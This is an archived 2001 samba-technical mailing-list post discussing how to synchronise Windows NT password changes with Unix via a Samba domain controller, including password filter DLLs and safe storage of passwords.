OT: change NT login procedure

Toomas Soome tsoome at ut.ee
Wed Jan 31 09:54:21 GMT 2001 

James Sutherland wrote:

> > windows-> unix is a problem, because we do not get cleartext old
> > password from windows client (am I wrong?). if so, we must save
> > plaintext passwords into the safe place (crypted with some internal
> > key). it is generally bad idea to have plaintext passwords around, but
> > in university environment it is not totally unacceptable. I mean, such
> > database must be protected with some sort of encryption and if someone
> > wants passwords, well it is possible to use sniffers from pc classes,
> > one can do dictionary attack against password hashes etc.
> 
> Against NT's "encryption", dictionary attacks are trivial (a few minutes
> to run a large wordlist); even brute force on an ordinary desktop PC isn't
> hard.

exactly.

> 
> > so, if safe sorage for old (or current) passwords is implemented, next
> > task is to rewrite current samba interface for password change to use
> > standard pam interface (with old password from internal storage and new
> > password from client) and it's done. nice and clean.
> >
> > of course, there are but's. how to handle username maps, what happens if
> > we are going to have domain trust or kerberos environment etc...
> 
> Two possibilities:
> 
> 1. There is a pair of DLLs Novell replace in NDS for NT, which diverts all
> NT auth stuff (including password changes) onto the NDS tree.
> 
> 2. You can provide a "password filter" DLL to implement password checking
> when the user changes password (e.g. check the new password is over X
> characters, mixed case and numbers) - obviously, this DLL *IS* passed the
> plaintext password - and username, I think.

yes, and implementing protocol to send these password securely to unix
box is relatively an easy task as well. 

> 
> Actually, if the NT machine tries to change the password on the Samba
> machine, it should be synchronised back to Unix anyway, shouldn't it? In
> which case, with Samba as your PDC, you should be OK.
> 
> The question is, can you get NT servers to authenticate against a Samba
> PDC now???

I'm doing this every day:) we do have here 4 NT classes authenticating
against samba pdc (2.0.7) and lots of staff workstations. also I'm
working currently with samba 2.2.0 and w2k (w2k is joined to samba
domain). sure, there are problems, but I can live with them and 2.2.0
looks very good - there is lots of work done, to implement missing
functionality.
 
toomas
-- 
Oh, I don't blame Congress.  If I had $600 billion at my disposal, I'd
be irresponsible, too.
		-- Lichty & Wagner

More information about the samba-technical mailing list